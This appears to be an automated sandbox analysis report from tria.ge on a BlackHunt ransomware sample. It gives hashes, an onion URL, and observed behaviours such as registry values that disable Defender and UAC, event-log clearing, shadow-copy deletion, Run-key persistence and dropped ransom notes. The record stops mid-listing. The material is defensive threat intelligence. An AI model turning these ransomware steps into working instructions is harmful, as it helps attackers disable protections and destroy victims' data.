Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:07
Static task
static1
Behavioral task
behavioral1
Sample
8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe
Resource
win10v2004-20231222-en
General
-
Target
8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe
-
Size
707KB
-
MD5
97ce6f3f3a71da7b1918cc7ab41d251a
-
SHA1
b651fb3fd6d9f3f869488213f746e232e8b01707
-
SHA256
8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268
-
SHA512
fed152b9a34d6209f73372e692a144b1113339f49ee5b2924b365de6386f62a3b4e15a3c77771851b7f8632202f7376712c5145917f7b5a6704604925df5281a
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1u8tvnh:6uaTmkZJ+naie5OTamgEoKxLWtZh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7976 fsutil.exe 17240 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 17052 wevtutil.exe 17040 wevtutil.exe 17384 wevtutil.exe 17272 wevtutil.exe 17068 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 7424 bcdedit.exe 6740 bcdedit.exe 17360 bcdedit.exe 17348 bcdedit.exe -
Renames multiple (3373) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5644 wbadmin.exe 17200 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\J: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\W: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\T: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\A: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\K: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\N: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\S: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\G: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\Z: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\X: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\B: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\E: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\R: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\V: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\I: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\P: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\M: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\O: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\H: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\U: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\L: 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons2x.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\welcome-2x.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\ui-strings.js 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ar-ae\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ar-ae\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ar-ae\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-up.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files\Java\jdk-1.8\jvisualvm.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_reader_logo.svg 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-focus_32.svg 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main.css 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files\BackupInitialize.MOD 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons2x.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\ui-strings.js 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_pattern_RHP.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\logo_retina.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\nub.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ar-ae\#BlackHunt_ReadMe.hta 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\#BlackHunt_ReadMe.txt 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\ui-strings.js 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#BlackHunt_Private.key 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_fw.png 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7628 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7660 vssadmin.exe 6152 vssadmin.exe 7892 vssadmin.exe 6756 vssadmin.exe 7508 vssadmin.exe 10792 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 14120 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 17204 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Token: SeRestorePrivilege 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Token: SeBackupPrivilege 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Token: SeTakeOwnershipPrivilege 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Token: SeAuditPrivilege 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Token: SeSecurityPrivilege 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Token: SeIncBasePriorityPrivilege 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Token: SeBackupPrivilege 7112 vssvc.exe Token: SeRestorePrivilege 7112 vssvc.exe Token: SeAuditPrivilege 7112 vssvc.exe Token: SeBackupPrivilege 10144 wbengine.exe Token: SeRestorePrivilege 10144 wbengine.exe Token: SeSecurityPrivilege 10144 wbengine.exe Token: SeSecurityPrivilege 17068 wevtutil.exe Token: SeBackupPrivilege 17068 wevtutil.exe Token: SeSecurityPrivilege 17040 wevtutil.exe Token: SeBackupPrivilege 17040 wevtutil.exe Token: SeSecurityPrivilege 17052 wevtutil.exe Token: SeBackupPrivilege 17052 wevtutil.exe Token: SeSecurityPrivilege 17384 wevtutil.exe Token: SeBackupPrivilege 17384 wevtutil.exe Token: SeSecurityPrivilege 17272 wevtutil.exe Token: SeBackupPrivilege 17272 wevtutil.exe Token: SeDebugPrivilege 14120 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4100 wrote to memory of 988 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 94 PID 4100 wrote to memory of 988 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 94 PID 4100 wrote to memory of 116 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 96 PID 4100 wrote to memory of 116 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 96 PID 4100 wrote to memory of 4560 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 98 PID 4100 wrote to memory of 4560 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 98 PID 4100 wrote to memory of 400 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 99 PID 4100 wrote to memory of 400 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 99 PID 4100 wrote to memory of 2812 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 102 PID 4100 wrote to memory of 2812 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 102 PID 4100 wrote to memory of 4504 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 105 PID 4100 wrote to memory of 4504 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 105 PID 4100 wrote to memory of 1952 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 104 PID 4100 wrote to memory of 1952 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 104 PID 4100 wrote to memory of 552 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 110 PID 4100 wrote to memory of 552 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 110 PID 4560 wrote to memory of 1088 4560 cmd.exe 160 PID 4560 wrote to memory of 1088 4560 cmd.exe 160 PID 4100 wrote to memory of 928 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 126 PID 4100 wrote to memory of 928 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 126 PID 4100 wrote to memory of 1888 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 125 PID 4100 wrote to memory of 1888 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 125 PID 4100 wrote to memory of 992 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 111 PID 4100 wrote to memory of 992 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 111 PID 4100 wrote to memory of 392 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 113 PID 4100 wrote to memory of 392 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 113 PID 988 wrote to memory of 2096 988 cmd.exe 115 PID 988 wrote to memory of 2096 988 cmd.exe 115 PID 116 wrote to memory of 4708 116 cmd.exe 124 PID 116 wrote to memory of 4708 116 cmd.exe 124 PID 4100 wrote to memory of 1068 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 123 PID 4100 wrote to memory of 1068 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 123 PID 4100 wrote to memory of 1636 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 118 PID 4100 wrote to memory of 1636 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 118 PID 4100 wrote to memory of 3636 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 120 PID 4100 wrote to memory of 3636 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 120 PID 